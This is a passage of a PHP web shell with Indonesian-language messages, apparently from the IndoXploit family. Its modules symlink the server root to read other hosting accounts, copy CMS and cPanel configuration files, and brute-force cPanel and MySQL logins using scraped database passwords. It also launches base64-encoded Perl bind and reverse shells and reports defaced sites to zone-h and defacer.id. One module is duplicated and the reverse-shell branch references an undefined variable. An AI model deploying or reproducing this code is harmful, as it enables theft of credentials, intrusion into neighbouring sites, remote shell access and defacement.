  3098. foreach($d0mains as $d0main){
  3099. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  3100. flush();
  3101. if(strlen(trim($domains[1][0])) > 2){
  3102. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  3103. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  3104. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  3105. <td>".$user['name']."</td>
  3106. <td><a href='c7e_sym/c7e/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  3107. flush();
  3108. $dcount++;}}}
  3109. echo "</table>";
  3110. }else{
  3111. $TEST=@file('/etc/passwd');
  3112. if ($TEST){
  3113. @mkdir("c7e_sym",0777);
  3114. @chdir("c7e_sym");
  3115. exe("ln -s / c7e");
  3116. $file3 = 'Options Indexes FollowSymLinks
  3117. DirectoryIndex c7e.htm
  3118. AddType text/plain .php
  3119. AddHandler text/plain .php
  3120. Satisfy Any';
  3121. $fp3 = fopen('.htaccess','w');
  3122. $fw3 = fwrite($fp3,$file3);
  3123. @fclose($fp3);
  3124. echo "
  3125. <table align=center border=1><tr>
  3126. <td align=center><font size=3>S. No.</font></td>
  3127. <td align=center><font size=3>Users</font></td>
  3128. <td align=center><font size=3>Symlink</font></td></tr>";
  3129. $dcount = 1;
  3130. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  3131. while(!feof($file)){
  3132. $s = fgets($file);
  3133. $matches = array();
  3134. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  3135. $matches = str_replace("home/","",$matches[1]);
  3136. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3137. continue;
  3138. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3139. <td align=center><font class=txt>" . $matches . "</td>";
  3140. echo "<td align=center><font class=txt><a href=c7e_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3141. $dcount++;}fclose($file);
  3142. echo "</table>";}else{if($os != "Windows"){@mkdir("c7e_sym",0777);@chdir("c7e_sym");@exe("ln -s / c7e");$file3 = '
  3143. Options Indexes FollowSymLinks
  3144. DirectoryIndex c7e.htm
  3145. AddType text/plain .php
  3146. AddHandler text/plain .php
  3147. Satisfy Any
  3148. ';
  3149. $fp3 = fopen('.htaccess','w');
  3150. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3151. echo "
  3152. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  3153. <table align=center border=1><tr>
  3154. <td align=center><font size=3>ID</font></td>
  3155. <td align=center><font size=3>Users</font></td>
  3156. <td align=center><font size=3>Symlink</font></td></tr>";
  3157. $temp = "";$val1 = 0;$val2 = 1000;
  3158. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  3159. if ($uid)$temp .= join(':',$uid)."\n";}
  3160. echo '<br/>';$temp = trim($temp);$file5 =
  3161. fopen("test.txt","w");
  3162. fputs($file5,$temp);
  3163. fclose($file5);$dcount = 1;$file =
  3164. fopen("test.txt", "r") or exit("Unable to open file!");
  3165. while(!feof($file)){$s = fgets($file);$matches = array();
  3166. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  3167. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3168. continue;
  3169. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3170. <td align=center><font class=txt>" . $matches . "</td>";
  3171. echo "<td align=center><font class=txt><a href=c7e_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3172. $dcount++;}
  3173. fclose($file);
  3174. echo "</table></div></center>";unlink("test.txt");
  3175. } else
  3176. echo "<center><font size=3>Cannot create Symlink</font></center>";
  3177. }
  3178. }
  3179. }
  3180. elseif($_GET['EnsikologyScience'] == 'config') {
  3181. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  3182. $idx = mkdir("c7e_conf", 0777);
  3183. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  3184. $htc = fopen("c7e_conf/.htaccess","w");
  3185. fwrite($htc, $isi_htc);
  3186. while($passwd = fgets($etc)) {
  3187. if($passwd == "" || !$etc) {
  3188. echo "<font color=red>Can't read /etc/passwd</font>";
  3189. } else {
  3190. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  3191. foreach($user_config[1] as $c7euser) {
  3192. $user_config_dir = "/home/$c7euser/public_html/";
  3193. if(is_readable($user_config_dir)) {
  3194. $grab_config = array(
  3195. "/home/$c7euser/.my.cnf" => "cpanel",
  3196. "/home/$c7euser/.accesshash" => "WHM-accesshash",
  3197. "/home/$c7euser/public_html/po-content/config.php" => "Popoji",
  3198. "/home/$c7euser/public_html/vdo_config.php" => "Voodoo",
  3199. "/home/$c7euser/public_html/bw-configs/config.ini" => "BosWeb",
  3200. "/home/$c7euser/public_html/config/koneksi.php" => "Lokomedia",
  3201. "/home/$c7euser/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3202. "/home/$c7euser/public_html/clientarea/configuration.php" => "WHMCS",
  3203. "/home/$c7euser/public_html/whm/configuration.php" => "WHMCS",
  3204. "/home/$c7euser/public_html/whmcs/configuration.php" => "WHMCS",
  3205. "/home/$c7euser/public_html/forum/config.php" => "phpBB",
  3206. "/home/$c7euser/public_html/sites/default/settings.php" => "Drupal",
  3207. "/home/$c7euser/public_html/config/settings.inc.php" => "PrestaShop",
  3208. "/home/$c7euser/public_html/app/etc/local.xml" => "Magento",
  3209. "/home/$c7euser/public_html/joomla/configuration.php" => "Joomla",
  3210. "/home/$c7euser/public_html/configuration.php" => "Joomla",
  3211. "/home/$c7euser/public_html/wp/wp-config.php" => "WordPress",
  3212. "/home/$c7euser/public_html/wordpress/wp-config.php" => "WordPress",
  3213. "/home/$c7euser/public_html/wp-config.php" => "WordPress",
  3214. "/home/$c7euser/public_html/admin/config.php" => "OpenCart",
  3215. "/home/$c7euser/public_html/slconfig.php" => "Sitelok",
  3216. "/home/$c7euser/public_html/application/config/database.php" => "Ellislab");
  3217. foreach($grab_config as $config => $nama_config) {
  3218. $ambil_config = file_get_contents($config);
  3219. if($ambil_config == '') {
  3220. } else {
  3221. $file_config = fopen("c7e_conf/$c7euser-$nama_config.txt","w");
  3222. fputs($file_config,$ambil_config);
  3223. }
  3224. }
  3225. }
  3226. }
  3227. }
  3228. }
  3229. echo "<br><center><a href='?path=$path/c7e_conf'><font>Done</font></a></center>";
  3230. }elseif($_GET['EnsikologyScience'] == 'adminer') {
  3231. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3232. function adminer($url, $isi) {
  3233. $fp = fopen($isi, "w");
  3234. $ch = curl_init();
  3235. curl_setopt($ch, CURLOPT_URL, $url);
  3236. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3237. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3238. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3239. curl_setopt($ch, CURLOPT_FILE, $fp);
  3240. return curl_exec($ch);
  3241. curl_close($ch);
  3242. fclose($fp);
  3243. ob_flush();
  3244. flush();
  3245. }
  3246. if(file_exists('adminer.php')) {
  3247. echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3248. } else {
  3249. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3250. echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3251. } else {
  3252. echo "<center><font color=red>gagal buat file adminer</font></center>";
  3253. }
  3254. }
  3255. }elseif($_GET['EnsikologyScience'] == 'crkcp') {
  3256. echo '<center>';
  3257. if($_POST['crack']) {
  3258. $usercp = explode("\r\n", $_POST['user_cp']);
  3259. $passcp = explode("\r\n", $_POST['pass_cp']);
  3260. $i = 0;
  3261. foreach($usercp as $ucp) {
  3262. foreach($passcp as $pcp) {
  3263. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3264. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3265. } else {
  3266. $_SESSION[$ucp] = "1";
  3267. $_SESSION[$pcp] = "1";
  3268. if($ucp == '' || $pcp == '') {
  3269.  
  3270. } else {
  3271. $i++;
  3272. if(function_exists('posix_getpwuid')) {
  3273. $domain_cp = file_get_contents("/etc/named.conf");
  3274. if($domain_cp == '') {
  3275. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  3276. } else {
  3277. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3278. foreach($domains_cp[1] as $dj) {
  3279. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3280. $user_cp_url = $user_cp_url['name'];
  3281. if($user_cp_url == $ucp) {
  3282. $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
  3283. break;
  3284. }
  3285. }
  3286. }
  3287. } else {
  3288. $dom = "<font color=red>function is Disable by system</font>";
  3289. }
  3290. echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
  3291. }
  3292. }
  3293. }
  3294. }
  3295. }
  3296. if($i == 0) {
  3297. } else {
  3298. echo "<br>sukses nyolong ".$i." Cpanel by <font color=green>IndoXploit.</font>";
  3299. }
  3300. } else {
  3301. echo "<center>
  3302. <form method='post'>
  3303. USER: <br>
  3304. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3305. $_usercp = fopen("/etc/passwd","r");
  3306. while($getu = fgets($_usercp)) {
  3307. if($getu == '' || !$_usercp) {
  3308. echo "<font color=red>Can't read /etc/passwd</font>";
  3309. } else {
  3310. preg_match_all("/(.*?):x:/", $getu, $u);
  3311. foreach($u[1] as $user_cp) {
  3312. if(is_dir("/home/$user_cp/public_html")) {
  3313. echo "$user_cp\n";
  3314. }
  3315. }
  3316. }
  3317. }
  3318. echo "</textarea><br>
  3319. PASS: <br>
  3320. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3321. function cp_pass($path) {
  3322. $pass = "";
  3323. $patha = scandir($path);
  3324. foreach($patha as $pathb) {
  3325. if(!is_file("$path/$pathb")) continue;
  3326. $ambil = file_get_contents("$path/$path");
  3327. if(preg_match("/WordPress/", $ambil)) {
  3328. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3329. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3330. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3331. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3332. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3333. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3334. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3335. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3336. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3337. } elseif(preg_match("/^[client]$/", $ambil)) {
  3338. preg_match("/password=(.*?)/", $ambil, $pass1);
  3339. if(preg_match('/"/', $pass1[1])) {
  3340. $pass1[1] = str_replace('"', "", $pass1[1]);
  3341. $pass .= $pass1[1]."\n";
  3342. } else {
  3343. $pass .= $pass1[1]."\n";
  3344. }
  3345. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3346. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3347. }
  3348. }
  3349. echo $pass;
  3350. }
  3351. $cp_pass = cp_pass($path);
  3352. echo $cp_pass;
  3353. echo "</textarea><br>
  3354. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3355. </form>
  3356. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3357. }
  3358. }
  3359. elseif($_GET['EnsikologyScience'] == 'zoneh') {
  3360. if($_POST['submit']) {
  3361. echo '<center>';
  3362. $domain = explode("\r\n", $_POST['url']);
  3363. $nick = $_POST['nick'];
  3364. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3365. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3366. function zoneh($url,$nick) {
  3367. $ch = curl_init("http://www.zone-h.com/notify/single");
  3368. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3369. curl_setopt($ch, CURLOPT_POST, true);
  3370. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3371. return curl_exec($ch);
  3372. curl_close($ch);
  3373. }
  3374. foreach($domain as $url) {
  3375. $zoneh = zoneh($url,$nick);
  3376. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3377. echo "$url -> <font>OK</font><br>";
  3378. } else {
  3379. echo "$url -> <font color=red>ERROR</font><br>";
  3380. }
  3381. }
  3382. } else {
  3383. echo "<center><form method='post'>
  3384. <u>Defacer</u>: <br>
  3385. <input type='text' name='nick' size='50' value='RaBiitch'><br>
  3386. <u>Domains</u>: <br>
  3387. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3388. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3389. </form>";
  3390. }
  3391. echo "</center>";
  3392. }
  3393. elseif($_GET['EnsikologyScience'] == 'defid') {
  3394. echo "<center><form method='post'>
  3395. <u>Defacer</u>: <br>
  3396. <input type='text' name='hekel' size='50' value='RaBiitch'><br>
  3397. <u>Team</u>: <br>
  3398. <input type='text' name='tim' size='50' value='BlackHell Team'><br>
  3399. <u>Domains</u>: <br>
  3400. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  3401. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  3402. </form>";
  3403. $site = explode("\r\n", $_POST['sites']);
  3404. $go = $_POST['go'];
  3405. $hekel = $_POST['hekel'];
  3406. $tim = $_POST['tim'];
  3407. if($go) {
  3408. foreach($site as $sites) {
  3409. $zh = $sites;
  3410. $form_url = "https://www.defacer.id/notify";
  3411. $data_to_post = array();
  3412. $data_to_post['attacker'] = "$hekel";
  3413. $data_to_post['team'] = "$tim";
  3414. $data_to_post['poc'] = 'SQL Injection';
  3415. $data_to_post['url'] = "$zh";
  3416. $curl = curl_init();
  3417. curl_setopt($curl,CURLOPT_URL, $form_url);
  3418. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  3419. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  3420. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  3421. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3422. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  3423. $result = curl_exec($curl);
  3424. echo $result;
  3425. curl_close($curl);
  3426. echo "<br>";
  3427. }
  3428. }
  3429. }elseif($_GET['EnsikologyScience'] == 'jumping') {
  3430. $i = 0;
  3431. echo "<div class='margin: 5px auto;'>";
  3432. if(preg_match("/hsphere/", $dir)) {
  3433. $urls = explode("\r\n", $_POST['url']);
  3434. if(isset($_POST['jump'])) {
  3435. echo "<pre>";
  3436. foreach($urls as $url) {
  3437. $url = str_replace(array("http://","www."), "", strtolower($url));
  3438. $etc = "/etc/passwd";
  3439. $f = fopen($etc,"r");
  3440. while($gets = fgets($f)) {
  3441. $pecah = explode(":", $gets);
  3442. $user = $pecah[0];
  3443. $dir_user = "/hsphere/local/home/$user";
  3444. if(is_dir($dir_user) === true) {
  3445. $url_user = $dir_user."/".$url;
  3446. if(is_readable($url_user)) {
  3447. $i++;
  3448. $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3449. if(is_writable($url_user)) {
  3450. $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3451. }
  3452. echo $jrw."<br>";
  3453. }
  3454. }
  3455. }
  3456. }
  3457. if($i == 0) {
  3458. } else {
  3459. echo "<br>Hanya ada ".$i." Kamar di ".$ip;
  3460. }
  3461. echo "</pre>";
  3462. } else {
  3463. echo '<center>
  3464. <form method="post">
  3465. List Domains: <br>
  3466. <textarea name="url" style="width: 500px; height: 250px;">';
  3467. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3468. while($getss = fgets($fp)) {
  3469. echo $getss;
  3470. }
  3471. echo '</textarea><br>
  3472. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3473. </form></center>';
  3474. }
  3475. } elseif(preg_match("/vhosts/", $dir)) {
  3476. $urls = explode("\r\n", $_POST['url']);
  3477. if(isset($_POST['jump'])) {
  3478. echo "<pre>";
  3479. foreach($urls as $url) {
  3480. $web_vh = "/var/www/vhosts/$url/httpdocs";
  3481. if(is_dir($web_vh) === true) {
  3482. if(is_readable($web_vh)) {
  3483. $i++;
  3484. $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3485. if(is_writable($web_vh)) {
  3486. $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3487. }
  3488. echo $jrw."<br>";
  3489. }
  3490. }
  3491. }
  3492. if($i == 0) {
  3493. } else {
  3494. echo "<br>Hanya ada ".$i." Kamar di ".$ip;
  3495. }
  3496. echo "</pre>";
  3497. } else {
  3498. echo '<center>
  3499. <form method="post">
  3500. List Domains: <br>
  3501. <textarea name="url" style="width: 500px; height: 250px;">';
  3502. bing("ip:$ip");
  3503. echo '</textarea><br>
  3504. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3505. </form></center>';
  3506. }
  3507. } else {
  3508. echo "<pre>";
  3509. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3510. while($passwd = fgets($etc)) {
  3511. if($passwd == '' || !$etc) {
  3512. echo "<font color=red>Can't read /etc/passwd</font>";
  3513. } else {
  3514. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3515. foreach($user_jumping[1] as $myuser_jump) {
  3516. $user_jumping_dir = "/home/$myuser_jump/public_html";
  3517. if(is_readable($user_jumping_dir)) {
  3518. $i++;
  3519. $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3520. if(is_writable($user_jumping_dir)) {
  3521. $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3522. }
  3523. echo $jrw;
  3524. if(function_exists('posix_getpwuid')) {
  3525. $domain_jump = file_get_contents("/etc/named.conf");
  3526. if($domain_jump == '') {
  3527. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3528. } else {
  3529. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3530. foreach($domains_jump[1] as $dj) {
  3531. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3532. $user_jumping_url = $user_jumping_url['name'];
  3533. if($user_jumping_url == $myuser_jump) {
  3534. echo " => ( <u>$dj</u> )<br>";
  3535. break;
  3536. }
  3537. }
  3538. }
  3539. } else {
  3540. echo "<br>";
  3541. }
  3542. }
  3543. }
  3544. }
  3545. }
  3546. if($i == 0) {
  3547. } else {
  3548. echo "<br>Hanya ada ".$i." Kamar di ".$ip;
  3549. }
  3550. echo "</pre>";
  3551. }
  3552. echo "</div>";
  3553. }elseif($_GET['EnsikologyScience'] == 'network') {
  3554. echo "<form method='post'>
  3555. <u>Bind Port:</u> <br>
  3556. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3557. <input type='submit' name='sub_bp' value='>>'>
  3558. </form>
  3559. <form method='post'>
  3560. <u>Back Connect:</u> <br>
  3561. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3562. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3563. <input type='submit' name='sub_bc' value='>>'>
  3564. </form>";
  3565. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3566. if(isset($_POST['sub_bp'])) {
  3567. $f_bp = fopen("/tmp/bp.pl", "w");
  3568. fwrite($f_bp, base64_decode($bind_port_p));
  3569. fclose($f_bp);
  3570.  
  3571. $port = $_POST['port_bind'];
  3572. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3573. sleep(1);
  3574. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3575. unlink("/tmp/bp.pl");
  3576. }
  3577. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3578. if(isset($_POST['sub_bc'])) {
  3579. $f_bc = fopen("/tmp/bc.pl", "w");
  3580. fwrite($f_bc, base64_decode($bind_connect_p));
  3581. fclose($f_bc);
  3582.  
  3583. $ipbc = $_POST['ip_bc'];
  3584. $port = $_POST['port_bc'];
  3585. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3586. sleep(1);
  3587. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3588. unlink("/tmp/bc.pl");
  3589. }
  3590. }elseif($_GET['EnsikologyScience'] == 'jumping') {
  3591. $i = 0;
  3592. echo "<div class='margin: 5px auto;'>";
  3593. if(preg_match("/hsphere/", $dir)) {
  3594. $urls = explode("\r\n", $_POST['url']);
  3595. if(isset($_POST['jump'])) {
  3596. echo "<pre>";
  3597. foreach($urls as $url) {
  3598. $url = str_replace(array("http://","www."), "", strtolower($url));
  3599. $etc = "/etc/passwd";
  3600. $f = fopen($etc,"r");
  3601. while($gets = fgets($f)) {
  3602. $pecah = explode(":", $gets);
  3603. $user = $pecah[0];
  3604. $dir_user = "/hsphere/local/home/$user";
  3605. if(is_dir($dir_user) === true) {
  3606. $url_user = $dir_user."/".$url;
  3607. if(is_readable($url_user)) {
  3608. $i++;
  3609. $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3610. if(is_writable($url_user)) {
  3611. $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3612. }
  3613. echo $jrw."<br>";
  3614. }
  3615. }
  3616. }
  3617. }
  3618. if($i == 0) {
  3619. } else {
  3620. echo "<br>Hanya ada ".$i." Kamar di ".$ip;
  3621. }
  3622. echo "</pre>";
  3623. } else {
  3624. echo '<center>
  3625. <form method="post">
  3626. List Domains: <br>
  3627. <textarea name="url" style="width: 500px; height: 250px;">';
  3628. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3629. while($getss = fgets($fp)) {
  3630. echo $getss;
  3631. }
  3632. echo '</textarea><br>
  3633. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3634. </form></center>';
  3635. }
  3636. } elseif(preg_match("/vhosts/", $dir)) {
  3637. $urls = explode("\r\n", $_POST['url']);
  3638. if(isset($_POST['jump'])) {
  3639. echo "<pre>";
  3640. foreach($urls as $url) {
  3641. $web_vh = "/var/www/vhosts/$url/httpdocs";
  3642. if(is_dir($web_vh) === true) {
  3643. if(is_readable($web_vh)) {
  3644. $i++;
  3645. $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3646. if(is_writable($web_vh)) {
  3647. $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3648. }
  3649. echo $jrw."<br>";
  3650. }
  3651. }
  3652. }
  3653. if($i == 0) {
  3654. } else {
  3655. echo "<br>Hanya ada ".$i." Kamar di ".$ip;
  3656. }
  3657. echo "</pre>";
  3658. } else {
  3659. echo '<center>
  3660. <form method="post">
  3661. List Domains: <br>
  3662. <textarea name="url" style="width: 500px; height: 250px;">';
  3663. bing("ip:$ip");
  3664. echo '</textarea><br>
  3665. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3666. </form></center>';
  3667. }
  3668. } else {
  3669. echo "<pre>";
  3670. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3671. while($passwd = fgets($etc)) {
  3672. if($passwd == '' || !$etc) {
  3673. echo "<font color=red>Can't read /etc/passwd</font>";
  3674. } else {
  3675. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3676. foreach($user_jumping[1] as $myuser_jump) {
  3677. $user_jumping_dir = "/home/$myuser_jump/public_html";
  3678. if(is_readable($user_jumping_dir)) {
  3679. $i++;
  3680. $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3681. if(is_writable($user_jumping_dir)) {
  3682. $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3683. }
  3684. echo $jrw;
  3685. if(function_exists('posix_getpwuid')) {
  3686. $domain_jump = file_get_contents("/etc/named.conf");
  3687. if($domain_jump == '') {
  3688. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3689. } else {
  3690. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3691. foreach($domains_jump[1] as $dj) {
  3692. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3693. $user_jumping_url = $user_jumping_url['name'];
  3694. if($user_jumping_url == $myuser_jump) {
  3695. echo " => ( <u>$dj</u> )<br>";
  3696. break;
  3697. }
  3698. }
  3699. }
  3700. } else {
  3701. echo "<br>";
  3702. }
  3703. }
  3704. }
  3705. }
  3706. }
  3707. if($i == 0) {
  3708. } else {
  3709. echo "<br>Hanya ada ".$i." Kamar di ".$ip;
  3710. }
  3711. echo "</pre>";
  3712. }
  3713. echo "</div>";
  3714. }elseif($_GET['EnsikologyScience'] == 'mail') {
  3715. if($_POST['send']) {
  3716. $to = $_POST['to'];
  3717. $from = $_POST['from'];
  3718. $subject = $_POST['subject'];
  3719. $content = sulap($_POST['content']);
  3720. if(@mail($to,$subject,$content,"FROM:$from")) {
  3721. $out = "Mail sent to $to";
  3722. } else {
  3723. $out = "Failed !!";
  3724. }
  3725. }
